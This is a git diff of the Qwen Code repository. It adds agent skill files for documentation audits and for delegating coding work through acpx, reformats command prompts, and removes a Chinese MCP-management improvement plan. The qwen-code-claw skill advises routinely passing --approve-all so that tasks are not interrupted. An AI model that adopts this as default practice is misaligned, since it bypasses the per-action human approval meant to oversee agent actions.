diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index 33847b6c0..32d3aebe2 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -1,6 +1,3 @@ * @tanzhenxin @DennisYu07 @gwinthis @LaZzyMan @pomelo-nwu @Mingholy @DragonnZhang # SDK TypeScript package changes require review from Mingholy packages/sdk-typescript/** @Mingholy -# vscode-ide-companion and webui packages require review from yiliang114 -packages/vscode-ide-companion/** @yiliang114 -packages/webui/** @yiliang114 diff --git a/.gitignore b/.gitignore index 115964554..493296158 100644 --- a/.gitignore +++ b/.gitignore @@ -55,9 +55,11 @@ packages/vscode-ide-companion/*.vsix # Qwen Code Configs -.qwen/ +.qwen/* !.qwen/commands/ +!.qwen/commands/** !.qwen/skills/ +!.qwen/skills/** logs/ # GHA credentials gha-creds-*.json diff --git a/.qwen/commands/qc/code-review.md b/.qwen/commands/qc/code-review.md index b5846485a..021a80d9f 100644 --- a/.qwen/commands/qc/code-review.md +++ b/.qwen/commands/qc/code-review.md @@ -14,6 +14,7 @@ You are an expert code reviewer. Follow these steps: - Any potential issues or risks Keep your review concise but thorough. Focus on: + - Code correctness - Following project conventions - Performance implications diff --git a/.qwen/commands/qc/commit.md b/.qwen/commands/qc/commit.md index 76ef6b417..fab58da2e 100644 --- a/.qwen/commands/qc/commit.md +++ b/.qwen/commands/qc/commit.md @@ -5,22 +5,26 @@ description: Commit staged changes with an AI-generated commit message and push # Commit and Push ## Overview + Generate a clear, concise commit message based on staged changes, confirm with the user, then commit and push. ## Steps ### 1. Check repository status + - Run `git status` to check: - Are there any staged changes? - Are there unstaged changes? - What is the current branch? ### 2. Handle unstaged changes + - If there are unstaged changes, notify the user and list them - Do NOT add or commit unstaged changes - Proceed only with staged changes ### 3. 
Review staged changes + - Run `git diff --staged` to see all staged changes - Analyze the changes in depth to understand: - What files were modified/added/deleted @@ -28,6 +32,7 @@ Generate a clear, concise commit message based on staged changes, confirm with t - The scope and impact of the changes ### 4. Handle branch logic + - Get current branch name with `git branch --show-current` - **If current branch is `main` or `master`:** - Generate a proper branch name based on the changes @@ -40,6 +45,7 @@ Generate a clear, concise commit message based on staged changes, confirm with t - Wait for user decision ### 5. Generate commit message + - Types: feat, fix, docs, style, refactor, test, chore - Guidelines: - Be clear and concise @@ -49,6 +55,7 @@ Generate a clear, concise commit message based on staged changes, confirm with t - Include a footer explaining the purpose/impact of the changes **Format:** + ``` (): - (optional) @@ -59,12 +66,14 @@ This . ``` ### 6. Present the result and confirm with user + - Present the generated commit message - Show which branch will be used - Ask for confirmation: "Proceed with commit and push?" - Wait for user approval ### 7. Commit and push + - After user confirms: - `git commit -m ""` - `git push -u origin ` (use `-u` for new branches) diff --git a/.qwen/commands/qc/create-issue.md b/.qwen/commands/qc/create-issue.md index 54317621b..020ef00d0 100644 --- a/.qwen/commands/qc/create-issue.md +++ b/.qwen/commands/qc/create-issue.md @@ -5,9 +5,11 @@ description: Draft and submit a GitHub issue based on a user-provided idea # Create Issue ## Overview + Take the user's idea or bug description, investigate the codebase to understand the full context, draft a GitHub issue for review, and submit it once approved. 
## Input + The user provides a brief description of a feature request or bug report: {{args}} ## Steps diff --git a/.qwen/commands/qc/create-pr.md b/.qwen/commands/qc/create-pr.md index bf3c3c1e4..f2b491925 100644 --- a/.qwen/commands/qc/create-pr.md +++ b/.qwen/commands/qc/create-pr.md @@ -5,9 +5,11 @@ description: Create a pull request based on staged code changes # Create PR ## Overview + Create a well-structured pull request with proper description and title. ## Steps + 1. **Review staged changes** - Review all staged changes to understand what has been done - Do not touch unstaged changes @@ -31,4 +33,4 @@ Create a well-structured pull request with proper description and title. ## PR Template -@{.github/pull_request_template.md} \ No newline at end of file +@{.github/pull_request_template.md} diff --git a/.qwen/skills/docs-audit-and-refresh/SKILL.md b/.qwen/skills/docs-audit-and-refresh/SKILL.md new file mode 100644 index 000000000..f06161632 --- /dev/null +++ b/.qwen/skills/docs-audit-and-refresh/SKILL.md @@ -0,0 +1,71 @@ +--- +name: docs-audit-and-refresh +description: Audit the repository's docs/ content against the current codebase, find missing, incorrect, or stale documentation, and refresh the affected pages. Use when the user asks to review docs coverage, find outdated docs, compare docs with the current repo, or fix documentation drift across features, settings, tools, or integrations. +--- + +# Docs Audit And Refresh + +## Overview + +Audit `docs/` from the repository outward: inspect the current implementation, identify documentation gaps or inaccuracies, and update the relevant pages. Keep the work inside `docs/` and treat code, tests, and current configuration surfaces as the authoritative source. + +Read [references/audit-checklist.md](references/audit-checklist.md) before a broad audit so the scan stays focused on high-signal areas. + +## Workflow + +### 1. 
Build a current-state inventory + +Inspect the repository areas that define user-facing or developer-facing behavior. + +- Read the relevant code, tests, schemas, and package surfaces. +- Focus on shipped behavior, stable configuration, exposed commands, integrations, and developer workflows. +- Use the existing docs tree as a map of intended coverage, not as proof that coverage is complete. + +### 2. Compare implementation against `docs/` + +Look for three classes of issues: + +- Missing documentation for an existing feature, setting, tool, or workflow +- Incorrect documentation that contradicts the current codebase +- Stale documentation that uses old names, defaults, paths, or examples + +Prefer proving a gap with repository evidence before editing. Use current code and tests instead of intuition. + +### 3. Prioritize by reader impact + +Fix the highest-cost issues first: + +1. Broken onboarding, setup, auth, installation, or command flows +2. Wrong settings, defaults, paths, or feature behavior +3. Entirely missing documentation for a real surface area +4. Lower-impact clarity or organization improvements + +### 4. Refresh the docs + +Update the smallest correct set of pages under `docs/`. + +- Edit existing pages first +- Add new pages only for clear, durable gaps +- Update the nearest `_meta.ts` when adding or moving pages +- Keep examples executable and aligned with the current repository structure +- Remove dead or misleading text instead of layering warnings on top + +### 5. Validate the refresh + +Before finishing: + +- Search `docs/` for old terminology and replaced config keys +- Check neighboring pages for conflicting guidance +- Confirm new pages appear in the right `_meta.ts` +- Re-read critical examples, commands, and paths against code or tests + +## Audit standards + +- Favor breadth-first discovery, then depth on confirmed gaps. +- Do not rewrite large areas without evidence that they are wrong or missing. 
+- Keep README files out of scope for edits; limit changes to `docs/`. +- Call out residual gaps if the audit finds issues that are too large to solve in one pass. + +## Deliverable + +Produce a focused docs refresh that makes the current repository more accurate and complete. Summarize the audited surfaces and the concrete pages updated. diff --git a/.qwen/skills/docs-audit-and-refresh/references/audit-checklist.md b/.qwen/skills/docs-audit-and-refresh/references/audit-checklist.md new file mode 100644 index 000000000..54c0fb00f --- /dev/null +++ b/.qwen/skills/docs-audit-and-refresh/references/audit-checklist.md @@ -0,0 +1,41 @@ +# Audit Checklist + +Use this checklist to keep repository-wide documentation audits focused and repeatable. + +## High-signal repository surfaces + +- `packages/cli/**` + Inspect commands, flows, prompts, flags, and CLI-facing behavior. +- `packages/core/**` + Inspect shared behavior, settings, tools, provider integration, and feature semantics. +- `packages/sdk-typescript/**` and `packages/sdk-java/**` + Inspect SDK setup, usage, and examples that may affect developer docs. +- `packages/vscode-ide-companion/**`, `packages/zed-extension/**`, and related integration packages + Inspect IDE and extension behavior that should be reflected in user docs. +- `docs/**/_meta.ts` + Inspect navigation completeness after creating or moving pages. + +## Gap detection prompts + +Ask these questions while comparing the repo to `docs/`: + +- Does a visible feature exist in code but have no page or section in `docs/`? +- Does a docs page mention a command, setting, provider, or path that no longer exists? +- Do examples still match the current repository layout and command syntax? +- Is a page present but hidden or missing from `_meta.ts`? +- Do multiple pages describe the same feature inconsistently? 
+ +## Common drift patterns + +- Renamed settings keys or changed defaults +- Updated authentication or provider configuration flow +- New or removed CLI commands and flags +- New tool behavior or approval/sandbox semantics +- IDE integration changes that never reached the docs +- Features documented in the wrong section, making them hard to find + +## Output standard + +- Prefer a small number of precise edits over a speculative docs rewrite. +- Leave a clear summary of what was missing, wrong, or stale. +- If the audit uncovers a larger docs reorganization, fix the highest-impact inaccuracies first and note the remaining work. diff --git a/.qwen/skills/docs-update-from-diff/SKILL.md b/.qwen/skills/docs-update-from-diff/SKILL.md new file mode 100644 index 000000000..1f7eb722c --- /dev/null +++ b/.qwen/skills/docs-update-from-diff/SKILL.md @@ -0,0 +1,73 @@ +--- +name: docs-update-from-diff +description: Review local code changes with git diff and update the official docs under docs/ to match. Use when the user asks to document current uncommitted work, sync docs with local changes, update docs after a feature or refactor, or when phrases like "git diff", "local changes", "update docs", or "official docs" appear. +--- + +# Docs Update From Diff + +## Overview + +Inspect local diffs, derive the documentation impact, and update only the repository's `docs/` pages. Treat the current code as the source of truth and keep changes scoped, specific, and navigable. + +Read [references/docs-surface.md](references/docs-surface.md) before editing if the affected feature does not map cleanly to an existing docs section. + +## Workflow + +### 1. Build the change set + +Start from local Git state, not from assumptions. + +- Inspect `git status --short`, `git diff --stat`, and targeted `git diff` output. +- Focus on non-doc changes first so the documentation delta is grounded in code. +- Ignore `README.md` and other non-`docs/` content unless they help confirm intent. + +### 2. 
Derive the docs impact + +For every changed behavior, extract the user-facing or developer-facing facts that documentation must reflect. + +- New command, flag, config key, default, workflow, or limitation +- Renamed behavior or removed behavior +- Changed examples, paths, or setup steps +- New feature that belongs in an existing page but is not mentioned yet + +Prefer updating an existing page over creating a new page. Create a new page only when the feature introduces a stable topic that would make an existing page harder to follow. + +### 3. Find the right docs location + +Map each change to the smallest correct documentation surface: + +- End-user behavior: `docs/users/**` +- Developer internals, SDKs, contributor workflow, tooling: `docs/developers/**` +- Shared landing or navigation changes: root `docs/**` and `_meta.ts` + +If you add a new page, update the nearest `_meta.ts` in the same docs section so the page is discoverable. + +### 4. Write the update + +Edit documentation with the following bar: + +- State the current behavior, not the implementation history +- Use concrete commands, file paths, setting keys, and defaults from the diff +- Remove or rewrite stale text instead of stacking caveats on top of it +- Keep examples aligned with the current CLI and repository layout +- Preserve the repository's existing docs tone and heading structure + +### 5. Cross-check before finishing + +Verify that the updated docs cover the actual delta: + +- Search `docs/` for old names, removed flags, or outdated examples +- Confirm links and relative paths still make sense +- Confirm any new page is included in the relevant `_meta.ts` +- Re-read the changed docs against the code diff, not against memory + +## Practical heuristics + +- If a change affects commands, also check quickstart, workflows, and feature pages for drift. +- If a change affects configuration, also check `docs/users/configuration/settings.md`, feature pages, and auth/provider docs. 
+- If a change affects tools or agent behavior, check both `docs/users/features/**` and `docs/developers/tools/**` when relevant. +- If tests reveal expected behavior more clearly than implementation code, use tests to confirm wording. + +## Deliverable + +Produce the docs edits under `docs/` that make the current local changes understandable to a reader who has not seen the diff. Keep the final summary short and identify which pages were updated. diff --git a/.qwen/skills/docs-update-from-diff/references/docs-surface.md b/.qwen/skills/docs-update-from-diff/references/docs-surface.md new file mode 100644 index 000000000..a55f0a9b4 --- /dev/null +++ b/.qwen/skills/docs-update-from-diff/references/docs-surface.md @@ -0,0 +1,39 @@ +# Docs Surface Map + +Use this file to choose the correct destination page under `docs/`. + +## Primary sections + +- `docs/users/overview.md`, `quickstart.md`, `common-workflow.md` + Good for entry points, first-run guidance, and broad user workflows. +- `docs/users/features/*.md` + Good for user-visible features such as skills, MCP, sandbox, sub-agents, commands, checkpointing, and approval modes. +- `docs/users/configuration/*.md` + Good for settings, auth, model providers, themes, trusted folders, `.qwen` files, and similar configuration topics. +- `docs/users/integration-*.md` and `docs/users/ide-integration/*.md` + Good for IDEs, GitHub Actions, and editor companion behavior. +- `docs/users/extension/*.md` + Good for extension authoring and extension usage. +- `docs/developers/*.md` + Good for architecture, contributing workflow, roadmaps, and SDK overviews. +- `docs/developers/tools/*.md` + Good for tool behavior, tool contracts, and implementation-facing explanations. +- `docs/developers/development/*.md` + Good for contributor setup, deployment, tests, telemetry, and automation details. + +## Navigation rules + +- Root navigation lives in `docs/_meta.ts`. 
+- Section navigation lives in the nearest `_meta.ts`, for example: + - `docs/users/_meta.ts` + - `docs/users/features/_meta.ts` + - `docs/developers/_meta.ts` + - `docs/developers/tools/_meta.ts` +- If you create a page and do not add it to the right `_meta.ts`, the docs will be incomplete even if the markdown exists. + +## Placement heuristics + +- Put the change where a reader would naturally look first. +- Update multiple pages when a single feature appears in setup, reference, and workflow docs. +- Prefer adjusting a nearby existing page instead of creating a top-level page for a small delta. +- Avoid duplicating long explanations across pages; add one source page and update nearby pages with short pointers if needed. diff --git a/.qwen/skills/qwen-code-claw/SKILL.md b/.qwen/skills/qwen-code-claw/SKILL.md new file mode 100644 index 000000000..f9a7b6a17 --- /dev/null +++ b/.qwen/skills/qwen-code-claw/SKILL.md @@ -0,0 +1,201 @@ +--- +name: qwen-code-claw +description: Use Qwen Code as a Code Agent for code understanding, project generation, features, bug fixes, refactoring, and various programming tasks +--- + +# Qwen Code Claw + +## When to Use This Skill + +Use this skill when you need to: + +- Understand codebases or ask questions about source code +- Generate new projects or add new features +- Review pull requests in the codebase +- Fix bugs or refactor existing code +- Execute various programming tasks such as code review, testing, documentation generation, etc. +- Collaborate with other tools and agents to complete complex development tasks + +## Install + +```bash +npm install -g @qwen-code/qwen-code +``` + +For normal session reuse, prefer a global install over `npx`. + +## Authentication + +Check if authentication is already configured: + +```bash +qwen auth status +``` + +If authentication exists, skip this section. 
If not authenticated, check if the `BAILIAN_CODING_PLAN_API_KEY` environment variable exists: + +```bash +echo $BAILIAN_CODING_PLAN_API_KEY +``` + +**If `BAILIAN_CODING_PLAN_API_KEY` exists**, authenticate directly: + +```bash +qwen auth coding-plan --region china --key $BAILIAN_CODING_PLAN_API_KEY +``` + +**If the environment variable does not exist**, interrupt and prompt the user to authenticate via `qwen-oauth` or `coding-plan`: + +```bash +qwen auth +``` + +Or configure custom API after launching Qwen Code via `/auth`. + +## ACPX Integration + +You should always use `acpx` to run Qwen Code over the Agent Client Protocol (ACP) instead of scraping PTY sessions. + +To use acpx: + +1. **Install acpx globally** (recommended) or use npx: + + ```bash + npm install -g acpx@latest + ``` + + Or without installing: + + ```bash + npx acpx@latest + ``` + +2. **Install the acpx skill** for full reference: + + ```bash + npx acpx@latest --skill install acpx + ``` + +3. **Read the acpx skill reference** for every command, flag, and workflow pattern: + See the [ACPX Reference](#acpx-reference) section below for details + +4. **For complete CLI reference with all options and examples**: + https://raw.githubusercontent.com/openclaw/acpx/main/docs/CLI.md + +From now on, when you need to delegate work to Qwen Code, use `acpx` instead of spawning raw terminal sessions. For example: + +```bash +npx acpx@latest qwen "fix the failing tests" +npx acpx@latest qwen "refactor the auth module" +npx acpx@latest qwen exec "one-shot: summarize this repo" +``` + +> **Tip:** You should typically use the `--approve-all` flag to prevent task interruptions. 
+ +## Practical Workflows + +### Persistent Repository Assistant + +```bash +acpx qwen 'inspect failing tests and propose a fix plan' +acpx qwen 'apply the smallest safe fix and run tests' +``` + +### One-Shot Script Steps + +```bash +acpx qwen exec 'summarize repo purpose in 3 lines' +``` + +### Parallel Named Streams + +```bash +acpx qwen -s backend 'fix API pagination bug' +acpx qwen -s docs 'draft changelog entry for release' +``` + +### Queue Follow-ups Without Waiting + +```bash +acpx qwen 'run full test suite and investigate failures' +acpx qwen --no-wait 'after tests, summarize root causes and next steps' +``` + +### Machine-Readable Output for Orchestration + +```bash +acpx --format json qwen 'review current branch changes' > events.ndjson +``` + +### Repository-Wide Review with Permissive Mode + +```bash +acpx --cwd ~/repos/my-project --approve-all qwen -s pr-123 \ + 'review PR #123 for regressions and propose minimal patch' +``` + +## Approval Modes + +- `--approve-all`: No interactive prompts +- `--approve-reads` (default): Auto-approve reads/searches, prompt for writes +- `--deny-all`: Deny all permission requests + +If every permission request is denied/cancelled and none are approved, `acpx` exits with permission denied. + +## Best Practices + +1. Use **named sessions** for organizing different types of development tasks +2. Use `--no-wait` for long-running tasks to avoid blocking +3. Use `--approve-all` for non-interactive batch operations +4. Use `--format json` for automation and script integration +5. Use `--cwd` to manage context across multiple projects + +## ACPX Reference + +### Built-in Agent Registry + +Well-known agent names resolve to commands: + +- `qwen` → `qwen --acp` + +### Command Syntax + +```bash +# Default (prompt mode, persistent session) +acpx [global options] [prompt text...] +acpx [global options] prompt [options] [prompt text...] + +# One-shot execution +acpx [global options] exec [options] [prompt text...] 
+ +# Session management +acpx [global options] cancel [-s <name>] +acpx [global options] set-mode <mode> [-s <name>] +acpx [global options] set <key> <value> [-s <name>] +acpx [global options] status [-s <name>] +acpx [global options] sessions [list | new [--name <name>] | close [name] | show [name] | history [name] [--limit <count>]] +acpx [global options] config [show | init] + +# With explicit agent +acpx [global options] <agent> [options] [prompt text...] +acpx [global options] <agent> prompt [options] [prompt text...] +acpx [global options] <agent> exec [options] [prompt text...] +``` + +> **Note:** If prompt text is omitted and stdin is piped, `acpx` reads prompt from stdin. + +### Global Options + +| Option | Description | +| --------------------- | ------------------------------------------------------------ | +| `--agent <command>` | Raw ACP agent command (fallback mechanism) | +| `--cwd <dir>` | Session working directory | +| `--approve-all` | Auto-approve all requests | +| `--approve-reads` | Auto-approve reads/searches, prompt for writes (default) | +| `--deny-all` | Deny all requests | +| `--format <fmt>` | Output format: `text`, `json`, `quiet` | +| `--timeout <seconds>` | Maximum wait time (positive integer) | +| `--ttl <seconds>` | Idle TTL for queue owners (default: `300`, `0` disables TTL) | +| `--verbose` | Verbose ACP/debug logs to stderr | + +Flags are mutually exclusive where applicable. diff --git a/.qwen/skills/terminal-capture/SKILL.md b/.qwen/skills/terminal-capture/SKILL.md index 7fc99a18d..043f49542 100644 --- a/.qwen/skills/terminal-capture/SKILL.md +++ b/.qwen/skills/terminal-capture/SKILL.md @@ -211,31 +211,31 @@ This tool is commonly used for visual verification during PR reviews. 
For the co ```typescript interface FlowStep { - type?: string; // Input text - key?: string | string[]; // Key press(es) - capture?: string; // Viewport screenshot filename - captureFull?: string; // Full scrollback screenshot filename + type?: string; // Input text + key?: string | string[]; // Key press(es) + capture?: string; // Viewport screenshot filename + captureFull?: string; // Full scrollback screenshot filename streaming?: { - delayMs?: number; // Delay before first capture (default: 0) - intervalMs: number; // Interval between captures in ms - count: number; // Maximum number of captures - gif?: boolean; // Generate animated GIF (default: true) + delayMs?: number; // Delay before first capture (default: 0) + intervalMs: number; // Interval between captures in ms + count: number; // Maximum number of captures + gif?: boolean; // Generate animated GIF (default: true) }; } interface ScenarioConfig { - name: string; // Scenario name (also used as screenshot subdirectory name) - spawn: string[]; // Launch command ["node", "dist/cli.js", "--yolo"] - flow: FlowStep[]; // Interaction steps + name: string; // Scenario name (also used as screenshot subdirectory name) + spawn: string[]; // Launch command ["node", "dist/cli.js", "--yolo"] + flow: FlowStep[]; // Interaction steps terminal?: { - cols?: number; // Number of columns, default 100 - rows?: number; // Number of rows, default 28 - theme?: string; // Theme: dracula|one-dark|github-dark|monokai|night-owl - chrome?: boolean; // macOS window decorations, default true - title?: string; // Window title, default "Terminal" - fontSize?: number; // Font size - cwd?: string; // Working directory (relative to config file) + cols?: number; // Number of columns, default 100 + rows?: number; // Number of rows, default 28 + theme?: string; // Theme: dracula|one-dark|github-dark|monokai|night-owl + chrome?: boolean; // macOS window decorations, default true + title?: string; // Window title, default "Terminal" + 
fontSize?: number; // Font size + cwd?: string; // Working directory (relative to config file) }; - outputDir?: string; // Screenshot output directory (relative to config file) + outputDir?: string; // Screenshot output directory (relative to config file) } ``` diff --git a/OPTIMIZATION_PLAN.md b/OPTIMIZATION_PLAN.md deleted file mode 100644 index b56e14ea9..000000000 --- a/OPTIMIZATION_PLAN.md +++ /dev/null @@ -1,962 +0,0 @@ -# Qwen Code 0.12.0 MCP & Extension Management 优化方案 - -## 问题梳理与解决方案 - -根据钉钉文档《0.12.0 体验反馈》中提出的问题,本文件详细分析了每个问题的根本原因,并提供具体的解决方案和代码修改建议。 - ---- - -## 文档问题概览 - -本文档共包含 **6 个问题** (3 个 P1 + 3 个 P2),分为两个主要部分: - -### Part 1: MCP Management TUI (5 个问题) - -- **P1 级别**: 3 个问题 -- **P2 级别**: 2 个细节问题 (共 10 个小点) - -### Part 2: Extension Management TUI (1 个问题) - -- **P2 级别**: 1 个命令报错问题 - -## 问题 1: 【P1】Auth 属于 manage 的一部分,应该加到 manage 里 - -### 问题描述 - -- **现状**: 当前 MCP Management Dialog 中**没有 OAuth 认证功能**,用户必须使用 `/mcp auth ` 命令进行认证 -- **问题**: - - Auth 功能独立于 Manage Dialog 之外,用户体验割裂 - - 需要记住命令行才能认证,不够直观 - - MCP 管理对话框中只能查看服务器状态和工具,无法进行认证操作 -- **文档建议**: Auth 应该整合到 manage dialog 中,在 UI 界面内完成所有 MCP 管理操作 - -### 根本原因分析 - -#### 当前实现 - -```typescript -// packages/cli/src/ui/commands/mcpCommand.ts -const mcpCommand: SlashCommand = { - name: 'mcp', - subCommands: [manageCommand, authCommand], // auth 作为独立子命令存在 - action: async (): Promise => ({ - type: 'dialog', - dialog: 'mcp', // 默认打开管理对话框 - }), -}; -``` - -#### MCP Management Dialog 现状 - -```typescript -// packages/cli/src/ui/components/mcp/MCPManagementDialog.tsx -// 当前的步骤类型 -export const MCP_MANAGEMENT_STEPS = { - SERVER_LIST: 'server-list', - SERVER_DETAIL: 'server-detail', - DISABLE_SCOPE_SELECT: 'disable-scope-select', - TOOL_LIST: 'tool-list', - TOOL_DETAIL: 'tool-detail', -} as const; - -// ServerDetailStep 中的操作选项 -const actions = [ - { label: 'View tools', value: 'view-tools' }, - { label: 'Reconnect', value: 'reconnect' }, - { label: 'Enable/Disable', value: 'toggle-disable' }, - // ❌ 缺少 'Authenticate' 选项 -]; 
-``` - -#### 问题分析 - -1. **UI 层面**: MCP Management Dialog 中没有认证相关的 UI 组件和操作入口 -2. **代码层面**: OAuth 认证逻辑只在命令行 handler 中实现 (`mcpCommand.ts` 的 `authCommand`) -3. **体验层面**: 用户需要在 TUI 和 CLI 之间切换,无法在一个界面内完成所有操作 - -### 解决方案 - -#### 方案 A: 在 MCP Dialog 中集成完整的 OAuth 认证功能 (强烈推荐) - -**核心思路**: - -- 在 Server Detail 页面添加 "Authenticate" 操作选项 -- 复用现有的 `MCPOAuthProvider` 和 OAuth 流程 -- 通过事件系统显示认证过程中的提示信息 - -**实现步骤**: - -##### 1. 扩展 MCP_MANAGEMENT_STEPS - -```typescript -// packages/cli/src/ui/components/mcp/types.ts -export const MCP_MANAGEMENT_STEPS = { - SERVER_LIST: 'server-list', - SERVER_DETAIL: 'server-detail', - DISABLE_SCOPE_SELECT: 'disable-scope-select', - TOOL_LIST: 'tool-list', - TOOL_DETAIL: 'tool-detail', - AUTHENTICATE: 'authenticate', // 新增:认证步骤 -} as const; -``` - -##### 2. 在 ServerDetailStep 中添加认证选项 - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx -type ServerAction = - | 'view-tools' - | 'reconnect' - | 'toggle-disable' - | 'authenticate'; // 新增 - -const actions = useMemo(() => { - const result: Array<{ label: string; value: ServerAction }> = []; - - result.push({ label: t('View Tools'), value: 'view-tools' }); - - if (!server.isDisabled && server.status === MCPServerStatus.DISCONNECTED) { - result.push({ label: t('Reconnect'), value: 'reconnect' }); - } - - // 新增:显示认证选项的场景 - const needsAuth = - server.config.oauth?.enabled || - server.status === MCPServerStatus.DISCONNECTED || - server.errorMessage?.includes('401') || - server.errorMessage?.includes('OAuth'); - - if (needsAuth) { - result.push({ - label: t('Authenticate'), - value: 'authenticate', - icon: '🔐', // 可选:添加图标增强视觉提示 - }); - } - - result.push({ - label: server.isDisabled ? t('Enable') : t('Disable'), - value: 'toggle-disable', - }); - - return result; -}, [server]); -``` - -##### 3. 
在 MCPManagementDialog 中实现认证逻辑 - -```typescript -// packages/cli/src/ui/components/mcp/MCPManagementDialog.tsx -import { MCPOAuthProvider, MCPOAuthConfig } from '@qwen-code/qwen-code-core'; -import { appEvents, AppEvent } from '../../utils/events.js'; - -// 新增:处理认证 -const handleAuthenticate = useCallback(async () => { - if (!config || !selectedServer) return; - - try { - setIsLoading(true); - - // 显示开始认证提示 - context.ui.addItem( - { - type: 'info', - text: t("Starting OAuth authentication for '{{name}}'...", { - name: selectedServer.name, - }), - }, - Date.now() - ); - - // 监听并显示认证过程中的消息 - const displayListener = (message: string) => { - context.ui.addItem({ type: 'info', text: message }, Date.now()); - }; - appEvents.on(AppEvent.OauthDisplayMessage, displayListener); - - // 准备 OAuth 配置 - let oauthConfig: MCPOAuthConfig = selectedServer.config.oauth || { enabled: false }; - - // 执行认证 - const authProvider = new MCPOAuthProvider(new MCPOAuthTokenStorage()); - await authProvider.authenticate( - selectedServer.name, - oauthConfig, - selectedServer.config.httpUrl || selectedServer.config.url - ); - - // 认证成功 - context.ui.addItem( - { - type: 'success', - text: t("✓ Authentication successful for '{{name}}'", { - name: selectedServer.name, - }), - }, - Date.now() - ); - - // 移除消息监听器 - appEvents.off(AppEvent.OauthDisplayMessage, displayListener); - - // 重新加载服务器数据以更新状态 - await reloadServers(); - - // 返回上一级 - handleNavigateBack(); - } catch (error) { - debugLogger.error( - `Authentication failed for '${selectedServer.name}':`, - error - ); - context.ui.addItem( - { - type: 'error', - text: t("✗ Authentication failed: {{error}}", { - error: getErrorMessage(error), - }), - }, - Date.now() - ); - } finally { - setIsLoading(false); - } -}, [config, selectedServer, reloadServers, handleNavigateBack, context]); - -// 在 renderStepContent 中添加认证步骤的处理 -case MCP_MANAGEMENT_STEPS.AUTHENTICATE: - // 可以直接执行认证,或者显示一个确认对话框 - void handleAuthenticate(); - return {t('Authenticating...')}; -``` - 
-##### 4. 更新 i18n 翻译文件 - -```javascript -// packages/cli/src/i18n/locales/en.js -{ - 'Authenticate': 'Authenticate', - 'Authenticate with OAuth': 'Authenticate with OAuth', - "Starting OAuth authentication for '{{name}}'...": "Starting OAuth authentication for '{{name}}'...", - "✓ Authentication successful for '{{name}}'": "✓ Authentication successful for '{{name}}'", - "✗ Authentication failed: {{error}}": "✗ Authentication failed: {{error}}", -} -``` - -**优点**: - -- ✅ 用户体验统一,所有 MCP 管理操作在一个界面完成 -- ✅ 复用现有 OAuth 认证逻辑,开发成本低 -- ✅ 直观的视觉反馈,认证过程透明 -- ✅ 符合现代 UI/UX 设计原则 - -**缺点**: - -- ⚠️ 需要处理浏览器跳转和回调 (已有完善实现,风险低) - -#### 方案 B: 保留命令行但改进引导提示 - -如果某些场景下确实需要命令行认证 (如自动化脚本),可以: - -- 保留 `/mcp auth` 命令 -- 在 Dialog 中提供快速复制的命令模板 -- 添加"Copy Auth Command"按钮 - -但这会增加复杂性,不如方案 A 简洁。 - ---- - -## 问题 2: 【P1】一些异常状态 - -### 2.1 禁用之后还可以点击"查看工具",点进去是空的 - -#### 问题描述 - -- **现象**: MCP Server 被禁用后,仍然可以在 UI 中看到"查看工具"选项,点击进入后显示空列表 -- **期望**: 禁用后的服务器不应该显示"查看工具"选项,或者应该给出明确的提示信息 - -#### 根本原因分析 - -当前代码逻辑: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx -const actions = useMemo(() => { - const result: Array<{ label: string; value: ServerAction }> = []; - - // 无论服务器是否禁用,都添加"查看工具"选项 - result.push({ label: t('View Tools'), value: 'view-tools' }); - - if (server.status === 'disconnected') { - result.push({ label: t('Reconnect'), value: 'reconnect' }); - } - - result.push({ - label: server.isDisabled ? t('Enable') : t('Disable'), - value: 'toggle-disable', - }); - - return result; -}, [server]); -``` - -问题在于: - -1. 没有根据 `server.isDisabled` 状态过滤操作选项 -2. 禁用服务器的工具列表获取逻辑可能存在问题 -3. 
缺少用户友好的提示信息 - -#### 解决方案 - -**方案 A: 禁用时隐藏"查看工具"选项 (推荐)** - -**代码修改**: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx -const actions = useMemo(() => { - const result: Array<{ label: string; value: ServerAction }> = []; - - // 只在服务器启用且已连接时显示"查看工具"选项 - if (!server.isDisabled && server.status === MCPServerStatus.CONNECTED) { - result.push({ - label: t('View Tools'), - value: 'view-tools', - disabled: server.toolCount === 0, // 可选:工具数量为 0 时禁用 - }); - } - - // 禁用状态下显示提示信息 - if (server.isDisabled) { - result.push({ - label: t('Enable to view tools'), - value: 'toggle-disable', - }); - } else { - if (server.status === MCPServerStatus.DISCONNECTED) { - result.push({ label: t('Reconnect'), value: 'reconnect' }); - } - - result.push({ - label: t('Disable'), - value: 'toggle-disable', - }); - } - - return result; -}, [server]); -``` - -**同时修改 ToolListStep**: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ToolListStep.tsx -export const ToolListStep: React.FC = ({ - tools, - serverName, - onSelect, - onBack, -}) => { - // 添加禁用状态检查 - if (tools.length === 0) { - return ( - - - {t('No tools available for this server.')} - - {/* 添加提示:服务器可能被禁用 */} - - {t('Note: This server may be disabled. Please enable it in the server settings.')} - - - ); - } - // ... 
其余代码保持不变 -}; -``` - -**方案 B: 显示友好提示并阻止导航** - -在 `MCPManagementDialog` 中添加拦截逻辑: - -```typescript -// packages/cli/src/ui/components/mcp/MCPManagementDialog.tsx -const handleViewTools = useCallback(() => { - if (!selectedServer) return; - - // 检查服务器是否禁用 - if (selectedServer.isDisabled) { - // 显示提示信息,不执行导航 - debugLogger.warn( - `Cannot view tools for disabled server '${selectedServer.name}'`, - ); - // 可选:在 UI 上显示临时消息 - return; - } - - // 检查是否有工具 - if (selectedServer.toolCount === 0) { - debugLogger.info(`No tools available for server '${selectedServer.name}'`); - // 仍然可以进入查看,但会显示空状态提示 - } - - handleNavigateToStep(MCP_MANAGEMENT_STEPS.TOOL_LIST); -}, [selectedServer, handleNavigateToStep]); -``` - -#### 推荐方案:方案 A + ToolListStep 的提示增强 - ---- - -### 2.2 禁用之后还能重新连接 - -#### 问题描述 - -- **现象**: MCP Server 被禁用后,仍然可以看到"重新连接"选项 -- **期望**: 禁用之后应该没有"重新连接"入口 -- **文档建议**: 禁用之后应该没有"重新连接"入口 - -#### 根本原因分析 - -当前代码逻辑: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx -if (server.status === 'disconnected') { - result.push({ label: t('Reconnect'), value: 'reconnect' }); -} -``` - -问题在于: - -1. 